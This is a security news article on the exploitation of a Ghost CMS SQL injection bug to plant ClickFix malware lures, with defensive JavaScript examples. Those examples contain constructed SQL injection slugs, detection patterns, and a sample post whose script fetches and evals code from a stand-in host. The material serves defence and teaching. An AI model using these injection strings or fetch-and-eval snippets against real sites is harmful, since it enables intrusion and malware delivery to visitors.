May 26, 2026 · 7 min read
Attackers Chained a 9.4 Severity Ghost CMS SQL Injection Bug to Seed ClickFix Malware on More Than 700 Unpatched Sites—Including Harvard University, Oxford University, Auburn University, and DuckDuckGo, Each Briefly Serving a Fake Cloudflare Prompt That Ran a Shell Command on Visiting Windows Machines
XLab researchers at Qianxin disclosed on May 25, 2026 that CVE-2026-26980, an SQL injection bug in Ghost CMS's Content API, was being exploited at scale to inject JavaScript into article bodies on more than 700 unpatched sites. The injected script renders a fake Cloudflare verification overlay that instructs Windows visitors to paste a command into the Run dialog. The patch shipped in Ghost 6.19.1 on February 19, 2026. Hundreds of sites had not applied it three months later.
Key Takeaways
- CVE-2026-26980 is a CVSS 9.4 SQL injection vulnerability in Ghost CMS versions 3.24.0 through 6.19.0, residing in the slug filter ordering code path of the Content API's input serializer.
- XLab's threat intelligence team at Qianxin disclosed mass exploitation on May 25, 2026, confirming impact on more than 700 unpatched Ghost installations.
- Confirmed compromised sites include Harvard University, Oxford University, Auburn University, and DuckDuckGo, alongside fintech, AI, and media operators running Ghost without the patch.
- The attack chain steals admin API keys via SQL injection, uses them to insert JavaScript into article bodies, and serves a fake Cloudflare human verification overlay that runs a malicious command in the Windows Run dialog. Payloads observed include UtilifySetup.exe (an Electron based stealer), DLL loaders, and JavaScript droppers.
- Patch released February 19, 2026 in Ghost 6.19.1. Mitigation is to upgrade. The patch replaces flawed SQL string interpolation with parameterized queries.
What Is CVE-2026-26980?
Ghost is a Node.js based open source content management system used by publications, personal blogs, and SaaS marketing sites. Its Content API accepts a slug filter: when a caller filters posts by a list of slugs, Ghost returns them in the order the slugs were listed. The implementation that shipped in Ghost 3.24.0 and survived through 6.19.0 built that ordering as a SQL CASE expression and embedded the caller-supplied slug values directly into it with string concatenation. The values were neither parameterized nor escaped, and the Content API is unauthenticated for read traffic.
The resulting bug is textbook SQL injection. A crafted slug value lands in the generated CASE expression as SQL rather than as data and executes with the privileges of the Ghost database user. That user has full read and write access to the entire Ghost database, which on a standard install includes the encrypted admin API key, every post and page, every user account, the settings table, and the content API key table.
The vulnerability scored 9.4 under CVSS 3.1 because the access vector is network, complexity is low, no authentication is required, and the impact spans confidentiality, integrity, and availability. A patch was issued on February 19, 2026 as Ghost 6.19.1. The patch replaces the string interpolation with a parameterized query that binds slug values as parameters, so a crafted value is compared as a string literal instead of being interpreted as SQL.
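The bug class described above, shown as an added example rather than Ghost's own code: two builders for the slug-ordering CASE expression. The first interpolates caller-supplied slugs into the SQL text, which is the pattern the vulnerable versions used; the second emits placeholders plus a separate bindings array, the shape a parameterized query takes. The table and column names, the query text, and the malicious slug are all constructed for illustration and are not taken from Ghost's schema or from the campaign.

```javascript
// Added example, not Ghost's code. Table/column names are assumed for illustration.

// VULNERABLE pattern: slug values concatenated straight into SQL text.
// Note that the THEN index is a server-generated integer; the slug is the
// only caller-controlled value, and it is what breaks the query.
function buildOrderByVulnerable(slugs) {
  const whens = slugs
    .map((slug, i) => `WHEN slug = '${slug}' THEN ${i}`)
    .join(" ");
  return (
    "SELECT id, slug, title FROM posts WHERE status = 'published' " +
    `ORDER BY CASE ${whens} ELSE ${slugs.length} END`
  );
}

// PATCHED pattern: the SQL text contains only placeholders; the slugs travel
// in a bindings array that the driver sends as data, never as SQL.
function buildOrderByParameterized(slugs) {
  const whens = slugs.map((_, i) => `WHEN slug = ? THEN ${i}`).join(" ");
  return {
    sql:
      "SELECT id, slug, title FROM posts WHERE status = 'published' " +
      `ORDER BY CASE ${whens} ELSE ${slugs.length} END`,
    bindings: [...slugs],
  };
}

// Sanity check a practitioner can keep as a regression test: every
// placeholder must have exactly one binding, and no caller input may
// appear verbatim in the SQL text.
function countPlaceholders(sql) {
  return (sql.match(/\?/g) || []).length;
}

function isSafelyBound(query, userInputs) {
  if (countPlaceholders(query.sql) !== query.bindings.length) return false;
  return userInputs.every((input) => !query.sql.includes(input));
}

// Constructed malicious slug: closes the string literal, supplies its own
// CASE branches, and comments out the remainder of the generated SQL.
const CONSTRUCTED_MALICIOUS_SLUG = "x' THEN 0 ELSE (SELECT 1) END -- ";

function demo() {
  const inputs = [CONSTRUCTED_MALICIOUS_SLUG, "about"];
  const vulnerable = buildOrderByVulnerable(inputs);
  const patched = buildOrderByParameterized(inputs);
  return {
    vulnerableSql: vulnerable,
    vulnerableLeaksInput: vulnerable.includes(CONSTRUCTED_MALICIOUS_SLUG),
    patchedSql: patched.sql,
    patchedBindings: patched.bindings,
    patchedSafe: isSafelyBound(patched, inputs),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The `isSafelyBound` check is the cheap invariant to enforce in a test suite: if any user-controlled string shows up inside the SQL text, or the placeholder count drifts from the bindings count, the query builder has regressed to concatenation.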
How Did the ClickFix Chain Reach Article Bodies?
Compromising a Ghost site with this bug is a three step process. Step one is the SQL injection, which extracts the site's admin API key. The admin API key is stored in the database as a JWT signing secret. Step two is using that key to mint an admin JWT that lets the attacker call Ghost's admin API as an authenticated administrator. Step three is using that admin authority to edit existing posts or create new ones, planting JavaScript that the Ghost theme will render to every visitor.
The injected JavaScript is a small loader. It fetches a second stage from attacker controlled infrastructure that performs visitor fingerprinting—user agent, screen resolution, browser language, time zone, IP reputation. Visitors who do not match the targeting profile see nothing. Visitors who do—Windows on a common consumer browser, English language, not in a known security researcher IP range—see a fake Cloudflare verification overlay loaded into an iframe.
The overlay tells the visitor to verify they are human by opening the Windows Run dialog (Win key plus R) and pasting a command the page has placed in the clipboard. The command is a PowerShell invocation that downloads and executes the next stage payload. XLab observed at least three distinct end stage payloads, including an Electron based stealer named UtilifySetup.exe, conventional DLL loaders, and JavaScript droppers. The whole flow is a standard ClickFix chain. The novelty is the delivery channel—700 trusted sites hosting the iframe.
Why Did Harvard and DuckDuckGo Run Vulnerable Ghost?
Both Harvard and DuckDuckGo used Ghost installations for content publishing—blogs, research updates, marketing posts—rather than for primary site infrastructure. Ghost is widely used for exactly this role. It is lightweight, easy to operate, has a clean editorial experience, and integrates cleanly with static front ends. None of those properties prevent the CVE-2026-26980 issue from compromising the install.
Both organizations have patched their installs and removed the malicious posts since disclosure. DuckDuckGo's blog displayed the fake Cloudflare overlay for a window of several days before remediation. Harvard's affected pages were research center blogs hosted on the Harvard domain. Auburn and Oxford fell into the same operational pattern: a Ghost install spun up by a department or initiative inside a larger organization, where the central security team was not in the patch pipeline for that specific install.
The lesson for developers and security teams is the lesson that ClickFix attacks have been teaching for two years. CMS supply chain compromises produce malicious payloads served from trusted origins. Same-origin protections in modern browsers do not help when the malicious script is served from the legitimate publisher's own origin. The compromise also bypasses corporate filtering policies that allow access to *.harvard.edu, *.ox.ac.uk, and duckduckgo.com.
What Does the ClickFix Lure Look Like in Practice?
A user lands on a Ghost post they intended to read. The page renders normally for a moment, then an overlay covers the article. The overlay carries Cloudflare's logo and color scheme. The text says something like "verify you are human" or "your IP is showing unusual activity". The instructions are: press Windows key + R, then Ctrl + V, then Enter.
A small number of users do exactly that. The clipboard contains a PowerShell command that downloads and executes a stealer. The user sees the article reload and assumes the verification succeeded. The stealer has begun harvesting browser cookies, saved passwords, browser autofill data, cryptocurrency wallet files, and stored authentication tokens for cloud services. It will exfiltrate them to the attacker's command and control infrastructure within minutes.
For developers and engineers reading this, the relevant pattern is that this chain works on Windows machines belonging to people who are technical enough to follow keyboard shortcuts but not paranoid enough to recognize that no legitimate verification system asks the user to paste a PowerShell command into Run. Browser warning UI does not catch it. Antivirus often does not catch it before exfiltration. The compromise is over before the user notices anything.
What Should Ghost Operators and Visitors Do?
For Ghost operators:
- Upgrade to Ghost 6.19.1 or later immediately. If you cannot upgrade, take the site offline until you can.
- Rotate every admin API key and content API key. Assume both have been exposed.
- Audit every post for unexpected JavaScript embeds. The malicious script is small and easy to spot if you grep the stored post HTML for script tags, fetch() calls, or eval().
- Reset the database password if the database is reachable from anywhere outside the host machine.
- Review web server access logs for slug filter requests with suspicious payloads. The pattern is recognizable.
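A triage script for the post audit and the access log review in the checklist above, added here as an example and not taken from Ghost, XLab, or the campaign. It makes three assumptions: access logs are in the common combined format, Content API requests carry their filter as `filter=slug:[a,b]` in the query string, and post rows expose their rendered content in a column named `html`. The log lines and post rows below are constructed; the flagged filter is a generic SQL metacharacter pattern, not a payload from the campaign.

```javascript
// Added example, not Ghost's or XLab's code. All sample data is constructed.

// Markers that do not belong in a slug list. Ghost's filter syntax does allow
// single-quoted strings, so a lone quote is only suspicious when unbalanced.
const SQL_MARKERS = /--|\/\*|;|\b(select|union|sleep|benchmark)\b/i;

// Pull the request target out of a combined-format access log line.
function requestTarget(line) {
  const m = line.match(/"(?:GET|POST|HEAD|PUT|DELETE|PATCH|OPTIONS) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Returns the decoded filter value when a Content API request carries a slug
// filter with SQL metacharacters or an unbalanced quote, otherwise null.
function suspiciousSlugFilter(line) {
  const target = requestTarget(line);
  if (!target || !target.startsWith("/ghost/api/content/")) return null;
  const qs = target.split("?")[1] || "";
  for (const pair of qs.split("&")) {
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = eq < 0 ? "" : pair.slice(eq + 1);
    if (name !== "filter") continue;
    let decoded;
    try {
      decoded = decodeURIComponent(value.replace(/\+/g, " "));
    } catch {
      decoded = value; // malformed percent-encoding: inspect the raw value
    }
    if (!/\bslug\s*:/.test(decoded)) continue;
    const quotes = (decoded.match(/'/g) || []).length;
    if (SQL_MARKERS.test(decoded) || quotes % 2 === 1) return decoded;
  }
  return null;
}

function scanAccessLog(lines) {
  const hits = [];
  for (const line of lines) {
    const filter = suspiciousSlugFilter(line);
    if (filter) hits.push({ ip: line.split(" ")[0], filter });
  }
  return hits;
}

// Indicators of injected script in stored post HTML. Ghost HTML cards can
// legitimately contain script, so treat hits as review candidates.
const SCRIPT_INDICATORS = [
  ["script tag", /<script\b/i],
  ["fetch()", /\bfetch\s*\(/],
  ["eval()", /\beval\s*\(/],
  ["atob()", /\batob\s*\(/],
  ["document.write", /document\.write/],
  ["inline event handler", /\son\w+\s*=/i],
];

function findInjectedScripts(posts) {
  const flagged = [];
  for (const post of posts) {
    const indicators = SCRIPT_INDICATORS
      .filter(([, re]) => re.test(post.html || ""))
      .map(([name]) => name);
    if (indicators.length) flagged.push({ id: post.id, slug: post.slug, indicators });
  }
  return flagged;
}

// Constructed sample data: one benign slug list, one injection attempt,
// one legitimately quoted filter, one ordinary page view.
const SAMPLE_LOG = [
  '203.0.113.7 - - [20/May/2026:10:01:02 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug%3A%5Bwelcome%2Cabout%5D HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [20/May/2026:10:01:09 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug%3A%5Bwelcome%27%20OR%201%3D1%20--%20%5D HTTP/1.1" 200 340 "-" "python-requests/2.31"',
  '203.0.113.7 - - [20/May/2026:10:01:30 +0000] "GET /ghost/api/content/posts/?key=abc&filter=slug%3A%27welcome%27 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
  '192.0.2.4 - - [20/May/2026:10:02:15 +0000] "GET /welcome/ HTTP/1.1" 200 12000 "-" "Mozilla/5.0"',
];

const SAMPLE_POSTS = [
  { id: 1, slug: "welcome", html: '<p>Hello</p><script>fetch("https://example.invalid/s.js").then(r=>r.text()).then(t=>eval(t))</script>' },
  { id: 2, slug: "about", html: "<p>We are a blog.</p>" },
  { id: 3, slug: "embed", html: '<figure class="kg-embed-card"><iframe src="https://www.youtube.com/embed/x" frameborder="0"></iframe></figure>' },
];

console.log("suspicious requests:", JSON.stringify(scanAccessLog(SAMPLE_LOG)));
console.log("posts to review:", JSON.stringify(findInjectedScripts(SAMPLE_POSTS)));
```

Run it against a real export by replacing `SAMPLE_LOG` with the lines of your access log and `SAMPLE_POSTS` with rows pulled from the posts table. The third sample line shows why the quote check counts rather than matches: a legitimately quoted filter value is not flagged, while an unbalanced quote is.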
For visitors who encountered a fake Cloudflare overlay, disconnect from the network, run a credible endpoint scan, change every password reachable through the affected browser (start with email and banking), and revoke active sessions on Microsoft, Google, and any cloud provider you use. The stealer payloads observed in this campaign exfiltrate fast enough that "I think I was just hit" is too late for the credentials, but it is not too late to reset before lateral movement.
For the broader pattern, this campaign reads as a textbook example of the same chain we covered in the ClickFix Windows Terminal Lumma Stealer story. The CMS bug changes. The Cloudflare overlay does not. The mitigation is to drill into your users that no real verification system ever asks for a paste into Run.